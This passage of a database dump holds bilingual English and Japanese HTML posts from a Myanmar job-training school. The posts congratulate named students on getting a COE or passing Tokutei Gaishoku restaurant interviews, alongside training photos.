data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/7.jpg\" data-entity-uuid=\"34b1b390-b965-4ef8-a414-e4c43d4cec36\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/8.jpg\" data-entity-uuid=\"2af8bad1-9df7-4a9d-a1b1-5f994ad47a5c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/9.jpg\" data-entity-uuid=\"619549dd-fd24-4f16-ab78-9e983128f35a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/10.jpg\" data-entity-uuid=\"aa9b0bb2-e3da-44de-8a9f-8f606dcb8d3c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/11_4.jpg\" data-entity-uuid=\"6c81fed4-3ff4-491a-8afc-eb7abed11dc8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/12.jpg\" data-entity-uuid=\"9423da42-a7d4-436a-9e5b-085a27741e43\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/13.jpg\" data-entity-uuid=\"c6568cda-7e75-411f-90bc-152646c08074\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/14.jpg\" data-entity-uuid=\"c306aca8-f7d3-4fb1-9c63-f35852f953a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/15.jpg\" data-entity-uuid=\"39fda66d-1b1a-418d-a77e-cd4975c52053\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/16.jpg\" data-entity-uuid=\"0a1ec768-aefe-4234-b9e9-3ff5f5ed28bd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/17.jpg\" data-entity-uuid=\"06104a5e-ddc4-44a9-a044-d21776f9055b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/18.jpg\" data-entity-uuid=\"34cefc7b-ace8-49e7-a30b-3f25f3c241a3\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 95, 524, 'ja', 0, '<blockquote><h3><strong>さらなる経験を積むためにヤンゴンの有名レストランで実務研修に参加する第2バッチの学生たちの写真。</strong></h3></blockquote><img src=\"/sites/default/files/inline-images/1_2.jpg\" data-entity-uuid=\"f55c58d0-0dc4-4ab7-a8ef-a06f23025b82\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/2_2.jpg\" data-entity-uuid=\"e43640aa-0416-483b-9f74-4b931881a554\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/3_2.jpg\" data-entity-uuid=\"a95c0918-82a4-4a55-81f9-1081a3572ed6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/4_2.jpg\" data-entity-uuid=\"833b6a48-32d2-49c4-9289-a8f56282609e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/5_0.jpg\" data-entity-uuid=\"d8dea806-be35-47f5-afe1-e09cf2ca0e33\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/6_0.jpg\" data-entity-uuid=\"9b72d526-fc43-4216-906a-a4e3f8d5c10a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/7.jpg\" data-entity-uuid=\"34b1b390-b965-4ef8-a414-e4c43d4cec36\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/8.jpg\" data-entity-uuid=\"2af8bad1-9df7-4a9d-a1b1-5f994ad47a5c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/9.jpg\" data-entity-uuid=\"619549dd-fd24-4f16-ab78-9e983128f35a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/10.jpg\" data-entity-uuid=\"aa9b0bb2-e3da-44de-8a9f-8f606dcb8d3c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/11_4.jpg\" data-entity-uuid=\"6c81fed4-3ff4-491a-8afc-eb7abed11dc8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/12.jpg\" data-entity-uuid=\"9423da42-a7d4-436a-9e5b-085a27741e43\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/13.jpg\" data-entity-uuid=\"c6568cda-7e75-411f-90bc-152646c08074\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/14.jpg\" data-entity-uuid=\"c306aca8-f7d3-4fb1-9c63-f35852f953a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/15.jpg\" data-entity-uuid=\"39fda66d-1b1a-418d-a77e-cd4975c52053\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/16.jpg\" data-entity-uuid=\"0a1ec768-aefe-4234-b9e9-3ff5f5ed28bd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/17.jpg\" data-entity-uuid=\"06104a5e-ddc4-44a9-a044-d21776f9055b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/18.jpg\" data-entity-uuid=\"34cefc7b-ace8-49e7-a30b-3f25f3c241a3\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 96, 489, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations NYEIN EI EI SHWE &amp; EI EI MON For Getting COE<img src=\"/sites/default/files/inline-images/Ei%20Ei%20Mon.jpg\" data-entity-uuid=\"e9598b10-e9d4-4106-b2a3-e9a15e7b1431\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Nyein%20Ei%20Ei%20shwe.jpg\" data-entity-uuid=\"2c761e77-09d4-4d40-a1aa-2dc855a27603\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 96, 489, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>NYEIN EI EI SHWE と EI EI MON、COE 取得おめでとうございます<img src=\"/sites/default/files/inline-images/Ei%20Ei%20Mon.jpg\" data-entity-uuid=\"e9598b10-e9d4-4106-b2a3-e9a15e7b1431\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Nyein%20Ei%20Ei%20shwe.jpg\" data-entity-uuid=\"2c761e77-09d4-4d40-a1aa-2dc855a27603\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 97, 491, 'en', 0, '<blockquote><h2>Congralutations!</h2></blockquote><p>Congralutations YU YU NWAY &amp; WIN PYAE SHAN &amp; KHIN KHIN KYAW &amp; HNIN THAZIN AUNG &amp; THET MYAT MYAT KHAING For Getting COE</p>', '', 'full_html'),
('activities', 0, 97, 491, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>YU YU NWAY、WIN PYAE SHAN、KHIN KHIN KYAW、HNIN THAZIN AUNG、THET MYAT MYAT KHAING、COE 取得おめでとうございます</p>', '', 'full_html'),
('activities', 0, 98, 493, 'en', 0, '<blockquote><p>Images of Restaurant Practical Training Class for 2nd Batch Students from NEW COMET.&nbsp;</p></blockquote><p>You don\'t have to worry about not getting enough experience for TOKUTEI GAISHOKU in Japan. All you have to do is to study hard and passing the interview is the ultimate Priority.&nbsp;</p><p>&nbsp;</p><img data-entity-uuid=\"d18f27cd-d715-4b28-bbbb-0d66b137413a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1_3.jpg\"><img data-entity-uuid=\"513ce649-00a4-4e66-ac9d-53af20aa48b5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/2_3.jpg\"><img data-entity-uuid=\"25f3e96e-4512-46a6-b92f-ee8868ca846a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/3_3.jpg\"><img data-entity-uuid=\"34d06090-f0cc-4ec8-937f-586a3252035c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/4_3.jpg\"><img data-entity-uuid=\"1caed8cb-fed6-4080-8df9-6de95a0f908d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/5_1.jpg\"><img data-entity-uuid=\"045afe86-0484-4003-b1c0-665a76524220\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/6_1.jpg\"><img data-entity-uuid=\"71665b06-ac33-416b-b7c5-61a8bbe946c3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/7_0.jpg\"><img data-entity-uuid=\"c7472549-3fe6-4aab-9f4f-75218dfb390e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/8_0.jpg\"><img data-entity-uuid=\"c09fa45d-fb6d-41fe-81cc-8861a942c7cf\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/9_0.jpg\"><img data-entity-uuid=\"b2ef25f0-89a4-461d-8b0b-e0306b3041db\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/10_0.jpg\"><img data-entity-uuid=\"d8f1ccf8-f54e-4940-8a11-74d011481187\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/11_5.jpg\"><img data-entity-uuid=\"7d5de3e5-0ed7-447b-bd64-0d789324043d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/12_0.jpg\"><img data-entity-uuid=\"775d5929-7013-4d99-86bd-aa0eb4faa580\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/13_0.jpg\"><img data-entity-uuid=\"08885aeb-3fe8-4c77-b2c4-be5c8f33b046\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/14_0.jpg\"><img data-entity-uuid=\"f23b1683-c5fe-4714-8537-5077371ebe00\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/15_0.jpg\"><img data-entity-uuid=\"cde4d163-3db2-433b-8299-9821cc3975e8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/16_0.jpg\"><img data-entity-uuid=\"fbfdfda9-7e7e-4116-a701-e69262ed6c28\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/17_0.jpg\"><img data-entity-uuid=\"eae545a2-eb3b-4b3f-8784-dd48cbad9d48\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/18_0.jpg\"><img data-entity-uuid=\"6f53592e-cd27-4faf-8626-06e8ff195f50\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/19.jpg\"><img data-entity-uuid=\"d6c8469c-1b6a-4ea7-a07c-c03a2d7d1f57\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/20.jpg\">', '', 'full_html'),
('activities', 0, 98, 493, 'ja', 0, '<blockquote><h3><strong>NEW COMET第2期生向けレストラン実習授業の様子です。</strong></h3></blockquote><p>日本で特定外職に就くために十分な経験を積めないことを心配する必要はありません。あなたがすべきことは一生懸命勉強することだけです。そして面接に合格することが最優先事項です。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/1_3.jpg\" data-entity-uuid=\"d18f27cd-d715-4b28-bbbb-0d66b137413a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/2_3.jpg\" data-entity-uuid=\"513ce649-00a4-4e66-ac9d-53af20aa48b5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/3_3.jpg\" data-entity-uuid=\"25f3e96e-4512-46a6-b92f-ee8868ca846a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/4_3.jpg\" data-entity-uuid=\"34d06090-f0cc-4ec8-937f-586a3252035c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/5_1.jpg\" data-entity-uuid=\"1caed8cb-fed6-4080-8df9-6de95a0f908d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/6_1.jpg\" data-entity-uuid=\"045afe86-0484-4003-b1c0-665a76524220\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/7_0.jpg\" data-entity-uuid=\"71665b06-ac33-416b-b7c5-61a8bbe946c3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/8_0.jpg\" data-entity-uuid=\"c7472549-3fe6-4aab-9f4f-75218dfb390e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/9_0.jpg\" data-entity-uuid=\"c09fa45d-fb6d-41fe-81cc-8861a942c7cf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/10_0.jpg\" data-entity-uuid=\"b2ef25f0-89a4-461d-8b0b-e0306b3041db\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/11_5.jpg\" data-entity-uuid=\"d8f1ccf8-f54e-4940-8a11-74d011481187\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/12_0.jpg\" data-entity-uuid=\"7d5de3e5-0ed7-447b-bd64-0d789324043d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/13_0.jpg\" data-entity-uuid=\"775d5929-7013-4d99-86bd-aa0eb4faa580\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/14_0.jpg\" data-entity-uuid=\"08885aeb-3fe8-4c77-b2c4-be5c8f33b046\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/15_0.jpg\" data-entity-uuid=\"f23b1683-c5fe-4714-8537-5077371ebe00\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/16_0.jpg\" data-entity-uuid=\"cde4d163-3db2-433b-8299-9821cc3975e8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/17_0.jpg\" data-entity-uuid=\"fbfdfda9-7e7e-4116-a701-e69262ed6c28\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/18_0.jpg\" data-entity-uuid=\"eae545a2-eb3b-4b3f-8784-dd48cbad9d48\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/19.jpg\" data-entity-uuid=\"6f53592e-cd27-4faf-8626-06e8ff195f50\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/20.jpg\" data-entity-uuid=\"d6c8469c-1b6a-4ea7-a07c-c03a2d7d1f57\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 99, 495, 'en', 0, '<blockquote><h2>Congralutations!</h2></blockquote><p>Congralutations NAN SU KHAING &amp; WUT YEE AUNG For Getting COE<img data-entity-uuid=\"e0ae44af-1d6d-4e8b-9ecd-316798168619\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/nan%20su%20khaing.jpg\"><img data-entity-uuid=\"21038db9-238a-4cfd-a2e1-52e18586c7eb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/wut%20yee%20aung.jpg\"></p>', '', 'full_html'),
('activities', 0, 99, 495, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>NAN SU KHAING と WUT YEE AUNG、COE 取得おめでとうございます<img src=\"/sites/default/files/inline-images/nan%20su%20khaing.jpg\" data-entity-uuid=\"e0ae44af-1d6d-4e8b-9ecd-316798168619\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/wut%20yee%20aung.jpg\" data-entity-uuid=\"21038db9-238a-4cfd-a2e1-52e18586c7eb\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 100, 497, 'en', 0, '<blockquote><h2><strong>CONGRATULATIONS!</strong></h2></blockquote><p><strong>Congratulations to BO BO ZAW for passing the Interview in Tokutei Gaishoku (Restaurant) !</strong></p><img data-entity-uuid=\"7615be17-84dd-45da-970d-25efa6e326ec\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/BO%20BO%20ZAW%2017-6-2024.jpg\">', '', 'full_html'),
('activities', 0, 100, 497, 'ja', 0, '<blockquote><h2><strong>おめでとうございます！</strong></h2></blockquote><p><strong>BO BO ZAWさん、特定外食（レストラン）の面接に合格しました、おめでとうございます！</strong></p><img src=\"/sites/default/files/inline-images/BO%20BO%20ZAW%2017-6-2024.jpg\" data-entity-uuid=\"7615be17-84dd-45da-970d-25efa6e326ec\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 101, 499, 'en', 0, '<blockquote><h2>Congratulations !</h2></blockquote><p>Congratulations to YAMIN PHYO for passing the Interview with Tokutei Gaishoku (Restaurant) !&nbsp;</p><img data-entity-uuid=\"ee2f4e43-eb50-4411-8634-6f66043ed641\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/YAMIN%20PHYO.jpg\">', '', 'full_html'),
('activities', 0, 101, 499, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>YAMIN PHYOさん、特定飲食店の面接合格おめでとうございます！</strong></p><img src=\"/sites/default/files/inline-images/YAMIN%20PHYO.jpg\" data-entity-uuid=\"ee2f4e43-eb50-4411-8634-6f66043ed641\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 102, 501, 'en', 0, '<blockquote><h2><strong>CONGRATULATIONS!</strong></h2></blockquote><p>Congratulations <strong>THAE SU YATI SOE </strong>on passing the Interview with Tokutei Gaishuku (Restaurant)&nbsp;</p><img data-entity-uuid=\"53416c8f-dcd2-4fee-b113-b5f3ea65f6eb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/THAE%20SU%20YATI%20SOE.jpg\">', '', 'full_html'),
('activities', 0, 102, 501, 'ja', 0, '<blockquote><h2><strong>おめでとうございます！</strong></h2></blockquote><p><strong>THAE SU YATI SOE</strong>さん、特定飲食店の面接合格おめでとうございます.</p><img src=\"/sites/default/files/inline-images/THAE%20SU%20YATI%20SOE.jpg\" data-entity-uuid=\"53416c8f-dcd2-4fee-b113-b5f3ea65f6eb\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 103, 505, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations KAW MYAR &amp; BUE MYAR SHAR &amp; EI EI NYEIN &amp; LAY LAY NAING &amp; NANG BWAR KYI &amp; PHRAY MYAR &amp; THU ZAR AUNG &amp; HNIN WAH KHINE<img data-entity-uuid=\"a0b2cab6-e2fa-4e17-b286-a43b4ea040fe\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/hnin%20wah%20khine.jpg\"> For Getting COE<img src=\"/sites/default/files/inline-images/bue%20myar%20shar.jpg\" data-entity-uuid=\"28442e78-17b2-4af1-8e56-2ed752c87165\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/ei%20ei%20nyein.jpg\" data-entity-uuid=\"0903ad00-25dc-449e-875c-ba200b8b0cfb\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/kaw%20myar.jpg\" data-entity-uuid=\"8a0634e8-499e-4ed8-8246-e5475de18a1e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/lay%20lay%20naing.jpg\" data-entity-uuid=\"95524bf9-2393-4824-a33c-59c0cb39c2d3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/nang%20bwar%20kyi.jpg\" data-entity-uuid=\"c42d5524-5814-4e88-a72e-eef9aa53abba\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/phray%20myar.jpg\" data-entity-uuid=\"1499fb56-2191-496d-9333-1f542fbd83ab\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/thu%20zar%20aung.jpg\" data-entity-uuid=\"45605d03-339e-4503-979d-0a7ed27ca73b\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 103, 505, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>KAW MYAR、BUE MYAR SHAR、EI EI NYEIN、LAY LAY NAING、NANG BWAR KYI、PHRAY MYAR、THU ZAR AUNG、HNIN WAH KHINE、COE 取得おめでとうございます<img src=\"/sites/default/files/inline-images/hnin%20wah%20khine.jpg\" data-entity-uuid=\"a0b2cab6-e2fa-4e17-b286-a43b4ea040fe\" data-entity-type=\"file\"> For Getting COE<img src=\"/sites/default/files/inline-images/bue%20myar%20shar.jpg\" data-entity-uuid=\"28442e78-17b2-4af1-8e56-2ed752c87165\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/ei%20ei%20nyein.jpg\" data-entity-uuid=\"0903ad00-25dc-449e-875c-ba200b8b0cfb\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/kaw%20myar.jpg\" data-entity-uuid=\"8a0634e8-499e-4ed8-8246-e5475de18a1e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/lay%20lay%20naing.jpg\" data-entity-uuid=\"95524bf9-2393-4824-a33c-59c0cb39c2d3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/nang%20bwar%20kyi.jpg\" data-entity-uuid=\"c42d5524-5814-4e88-a72e-eef9aa53abba\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/phray%20myar.jpg\" data-entity-uuid=\"1499fb56-2191-496d-9333-1f542fbd83ab\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/thu%20zar%20aung.jpg\" data-entity-uuid=\"45605d03-339e-4503-979d-0a7ed27ca73b\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 104, 504, 'en', 0, '<blockquote><p>CONGRATULATIONS!</p></blockquote><p>Congratulations KHAING SAPAL OO for passing TOKUTEI GAISHOKU (Restaurant) !&nbsp;</p><img data-entity-uuid=\"666edf96-9c03-4280-9178-e61455d2996e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/khaing%20sapal%20oo.jpg\">', '', 'full_html'),
('activities', 0, 104, 504, 'ja', 0, '<blockquote><h2><strong>おめでとうございます！</strong></h2></blockquote><h6><strong>KHAING SAPAL OO</strong>さん、特定外食（レストラン）合格おめでとうございます！</h6><img src=\"/sites/default/files/inline-images/khaing%20sapal%20oo.jpg\" data-entity-uuid=\"666edf96-9c03-4280-9178-e61455d2996e\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 105, 507, 'en', 0, '<blockquote><h2><img src=\"/sites/default/files/inline-images/hnin%20wai%20wai%20nwe.jpg\" data-entity-uuid=\"dc977b14-5c26-466f-9fdb-85acea3ec960\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/thidar%20khine.jpg\" data-entity-uuid=\"577142fe-ad03-4878-b4d3-46335892032b\" data-entity-type=\"file\">Congratulations!</h2></blockquote><p>Congratulations HNIN WAI WAI NWE &amp; THIDAR KHINE For Getting COE</p>', '', 'full_html'),
('activities', 0, 105, 507, 'ja', 0, '<blockquote><h2>おめでとう！</h2><p>HNIN WAI WAI NWE さんと THIDAR KHINE さん、COE 取得おめでとうございます</p><img data-entity-uuid=\"b5d96eee-7fd7-4f70-b1b8-4c4090330ed3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/hnin%20wai%20wai%20nwe_0.jpg\"><img data-entity-uuid=\"94c4c754-d793-45ac-ba7c-21cc18701640\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/thidar%20khine_0.jpg\"></blockquote>', '', 'full_html'),
('activities', 0, 106, 509, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations <strong>KHAING THAW THAW KHANT</strong> for passing TOKUTEI GAISHOKU (RESTAURANT) !&nbsp;</p><img data-entity-uuid=\"28cc69e0-4261-4e9c-84c3-ae7a54f94ca4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/khaing%20thaw%20thaw%20khant.jpg\"><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 106, 509, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>KHAING THAW THAW KHANT</strong> さん、特定外食 (レストラン) 合格おめでとうございます!</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/khaing%20thaw%20thaw%20khant.jpg\" data-entity-uuid=\"28cc69e0-4261-4e9c-84c3-ae7a54f94ca4\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 107, 511, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations PYAE SONE THU for passing Interview in TOKUTEI GAISHOKU (Restaurant)!</p><img data-entity-uuid=\"7fe289b8-da89-489c-93ef-1d01805746fa\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/pyae%20sone%20thu.jpg\">', '', 'full_html'),
('activities', 0, 107, 511, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>PYAE SONE THU</strong>さん、TOKUTEI GAISHOKU（レストラン）の面接に合格しました、おめでとうございます！</p><img src=\"/sites/default/files/inline-images/pyae%20sone%20thu.jpg\" data-entity-uuid=\"7fe289b8-da89-489c-93ef-1d01805746fa\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 108, 513, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations THAN HTUN NAING &amp; AUNG PYAE PAING &amp; EI KHIN &amp; HTET WAI AUNG &amp; LWIN PHYO KO KO &amp; THAE KO KO &amp; YU YU NYEIN For Getting COE</p><img src=\"/sites/default/files/inline-images/aung%20pyae%20paing.jpg\" data-entity-uuid=\"cecab7e3-81ed-40f2-ab93-72147d2efe9d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/ei%20khin.jpg\" data-entity-uuid=\"1900d959-ad06-459a-8d33-acb6fd05c509\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/htet%20wai%20aung.jpg\" data-entity-uuid=\"cca3a267-7b48-4850-8b87-95178312d360\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/lwin%20phyo%20ko%20ko.jpg\" data-entity-uuid=\"62627b2d-bb28-4558-98c4-d23242b3580c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/thae%20ko%20ko.jpg\" data-entity-uuid=\"3c219092-fded-4ac5-8ea9-e0663dafb60b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/than%20htun%20naing.jpg\" data-entity-uuid=\"02e66c3c-e6c7-4998-abb7-da133f18c2b0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/yu%20yu%20nyein.jpg\" data-entity-uuid=\"ba953d4c-6760-4d6c-9a38-888cd7beaab2\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 108, 513, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2><p>THAN HTUN NAING、AUNG PYAE PAING、EI KHIN、HTET WAI AUNG、LWIN PHYO KO KO、THAE KO KO、YU YU NYEIN の COE 取得おめでとうございます</p></blockquote><img src=\"/sites/default/files/inline-images/aung%20pyae%20paing.jpg\" data-entity-uuid=\"cecab7e3-81ed-40f2-ab93-72147d2efe9d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/ei%20khin.jpg\" data-entity-uuid=\"1900d959-ad06-459a-8d33-acb6fd05c509\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/htet%20wai%20aung.jpg\" data-entity-uuid=\"cca3a267-7b48-4850-8b87-95178312d360\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/lwin%20phyo%20ko%20ko.jpg\" data-entity-uuid=\"62627b2d-bb28-4558-98c4-d23242b3580c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/thae%20ko%20ko.jpg\" data-entity-uuid=\"3c219092-fded-4ac5-8ea9-e0663dafb60b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/than%20htun%20naing.jpg\" data-entity-uuid=\"02e66c3c-e6c7-4998-abb7-da133f18c2b0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/yu%20yu%20nyein.jpg\" data-entity-uuid=\"ba953d4c-6760-4d6c-9a38-888cd7beaab2\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 109, 515, 'en', 0, '<blockquote><h2><strong>CONGRATULATIONS !</strong></h2></blockquote><p>Congratulations CHAN MYAE THU for passing Interview for TOKUTEI GAISHOKU (Restaurant) !&nbsp;</p><img data-entity-uuid=\"0d3f7bc6-2289-4c43-a00d-72103c198982\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/chan%20myae%20thu.jpg\">', '', 'full_html'),
('activities', 0, 109, 515, 'ja', 0, '<blockquote><h2><strong>おめでとうございます！</strong></h2></blockquote><p><strong>CHAN MYAE THU</strong>さん、TOKUTEI GAISHOKU（レストラン）の面接に合格しました、おめでとうございます！</p><img src=\"/sites/default/files/inline-images/chan%20myae%20thu.jpg\" data-entity-uuid=\"0d3f7bc6-2289-4c43-a00d-72103c198982\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 110, 517, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations YAW CHANG for passing the Interview TOKUTEI GAISHOKU (RESTAURANT)!&nbsp;</p><img data-entity-uuid=\"2d3598bb-8b81-443f-a1f8-00997d76aa2f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/yaw%20chang.jpg\">', '', 'full_html'),
('activities', 0, 110, 517, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>YAW CHANG</strong>さん、特定外食（レストラン）面接合格おめでとうございます！</p><img src=\"/sites/default/files/inline-images/yaw%20chang.jpg\" data-entity-uuid=\"2d3598bb-8b81-443f-a1f8-00997d76aa2f\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 111, 519, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations KHIN KHIN KYAW &amp; THET MYAT MYAT KHINE &amp; HNIN THAZIN AUNG &amp; WIN PYAE SHAN &amp; YU YU NWAY For departure to big city of japan(Tokyo) in (11:35Am) with Tokutei Gaishoku Visa.Wishing for a better opportunity and health in Japan.</p><img src=\"/sites/default/files/inline-images/0-02-01-09af1556503cf895dc500a57405f7aa13bda935f637a35f55b84172b11f2a2ae_d81fb0503c8b859b.jpg\" data-entity-uuid=\"1d399c1c-d9d3-448c-aa45-06b499fbf9b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-aa1636055b47104715df7e99e33ca9902c656871af49c4863a99ac3efcbc0279_227b57d23debae7c.jpg\" data-entity-uuid=\"f726a3fc-4a54-40eb-94b1-ed5ae6f33a7e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-c00edf6b50b4e5f2cd07650374690479f7dddefba6627e6fb334a01e67f6ea28_153d57af8899ba69.jpg\" data-entity-uuid=\"12109f45-4ed9-46f9-9a48-bb4ba36ed3d0\" data-entity-type=\"file\"><img 